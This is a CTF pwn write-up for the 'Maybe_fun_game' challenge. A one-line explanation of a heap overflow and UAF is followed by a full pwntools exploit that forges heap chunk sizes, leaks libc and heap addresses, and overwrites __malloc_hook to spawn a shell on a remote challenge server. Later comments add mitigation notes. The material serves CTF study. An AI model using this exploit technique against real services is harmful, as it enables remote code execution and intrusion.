……会逆向就会做;
Maybe_fun_game
存在堆溢出和UAF,利用堆溢出修改chunk大小,让它进入unsorted bin而不是top,切割泄漏libc地址,然后就是UAF打__malloc_hook
1 | from pwn import* |
2 | import base64 |
3 | #context.log_level = 'DEBUG' |
def get_argv(recv_string,string):
    """Answer one service prompt with a base64-wrapped request.

    ``recv_string`` is the base64 text of the prompt to wait for (the service
    talks base64 in both directions, e.g. ``'Pg=='`` decodes to ``'>'``).
    ``string`` is the request body; it is prefixed with a fixed 0x28-byte
    header whose three 64-bit fields (0x30, 8, 0x8) are varied in the callers
    that send oversized bodies, so they appear to be length fields of the
    request -- confirm against the binary.  Runs under Python 2 pwntools
    (``str`` literals are concatenated with ``p32``/``p64`` output).
    """
    magic = p32(0x12345678) * 2
    header = magic + p64(0x30) + p64(8) + p64(0x8) + 'A' * 8
    p.sendafter(recv_string, base64.b64encode(header + string))
def Create(size,content):
    """Allocate a chunk through the service: menu choice ``'1'``, then
    ``size`` at the ``'ze >>'`` prompt and ``content`` at the ``'nt >>'``
    prompt (both prompts are matched as base64).
    """
    steps = (
        ('Pg==', '1'),
        ('emUgPj4=', str(size)),
        ('bnQgPj4=', content),
    )
    for prompt, answer in steps:
        get_argv(prompt, answer)
def Free():
    """Select menu choice ``'2'`` (free).  Defined but never used below."""
    choice = '2'
    get_argv('Pg==', choice)
def Edit(content):
    """Menu choice ``'3'`` (edit) followed by ``content`` at the ``'nt >>'``
    prompt, using the helper's default request header.
    """
    for prompt, answer in (('Pg==', '3'), ('bnQgPj4=', content)):
        get_argv(prompt, answer)
def View():
    """Menu choice ``'4'`` (view); the reply is read by the caller."""
    choice = '4'
    get_argv('Pg==', choice)
p = process('./main')
# NOTE(review): the local process handle above is overwritten on the next
# line and never closed, so a stray './main' is left running; keep only one.
libc =ELF('./libc-2.23.so')
p = remote('8.140.179.11',13452)

# --- Stage 1: corrupt a chunk header (the writeup's heap overflow) ---
# One small chunk, then a second allocation request (size 0x1000) followed by
# an edit (choice '3') whose request header carries much larger fields
# (0xF30 / 0xF08) than the helper's fixed 0x30 / 8.  The server appears to
# trust these client-supplied lengths -- inferred from the script; confirm in
# the binary.  Server-side fix: bound every length field by the size that was
# actually allocated for the chunk.
Create(0x20,'FMYY')
get_argv('Pg==','1')
get_argv('emUgPj4=',str(0x1000))
get_argv('Pg==','3')
#gdb.attach(p,"b *(0x555555554000+0xD10)")
# Forged chunk-size fields (0x3A1, 0x21, 0x791, 0x781) at fixed offsets.  Per
# the writeup this changes a chunk's size so it is placed in the unsorted bin
# instead of merging with top.
payload = '\x00'*0x28 + p64(0x3A1) + '\x00'*0x378 + p64(0x21) + '\x00'*0x18 + p64(0x791) + '\x00'*0x788 + p64(0x781)
p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)*2 + p64(0xF30) + p64(8) + p64(0xF08) + 'A'*8 + payload))

# --- Stage 2: leak libc and heap ---
# A one-byte content write, then View(); the writeup says the unsorted chunk
# is split here and the leftover bytes hold a libc pointer.  The reply is
# base64; the last 6 bytes are taken as the pointer.  0x68 is this script's
# distance from __malloc_hook to the leaked arena pointer on libc-2.23 --
# verify against the libc build if reusing.
Create(0x20,'\x78')
View()
p.recvline()
data = base64.b64decode(p.recvline())
libc_base = u64(data[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x68 #+ 0x100000000
log.info('LIBC:\t' + hex(libc_base))
# Same trick for a heap pointer; 0xA10 is a script-specific offset to the
# heap base (not derived on the page).
Create(0x10,'\x10')
View()
p.recvline()
data = base64.b64decode(p.recvline())
heap_base = u64(data[-6:].ljust(8,'\x00')) - 0xA10
log.info('HEAP:\t' + hex(heap_base))

# --- Stage 3: the writeup's UAF ---
# Edit (choice '3') with header fields (0, 0x68, 0x68).  Free() is never
# called in this script, so how a chunk becomes dangling is not visible here;
# the writeup only calls it a UAF.  Mitigation on the server: clear the
# pointer after free and refuse edit/view on a freed slot.
get_argv('Pg==','3')
p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)*2 + p64(0) + p64(0x68) + p64(0x68) + 'A'*8 + 'FMYY' + '\n'))


# --- Stage 4: overwrite __malloc_hook ---
# First 0x60 allocation stores a pointer to __malloc_hook - 0x23 as content;
# three more 0x60 allocations follow, then an edit writes 0x13 zero bytes and
# an 8-byte libc-relative value (0xF1207 -- the script does not document what
# is at that offset).  Presumably 0x13 + 0x23 - 0x10 (chunk header) lands the
# value exactly on __malloc_hook.  Note glibc >= 2.34 removed the malloc hooks,
# so this final step does not apply to current libc builds.
Create(0x60,p64(libc_base + libc.sym['__malloc_hook'] - 0x23))
Create(0x60,'FMYY')
Create(0x60,'FMYY')
Create(0x60,'FMYY')
get_argv('Pg==','3')
p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)*2 + p64(0x50) + p64(0x8) + p64(0x28) + 'A'*8 + '\x00'*0x13 + p64(libc_base + 0xF1207) + '\n'))

p.interactive()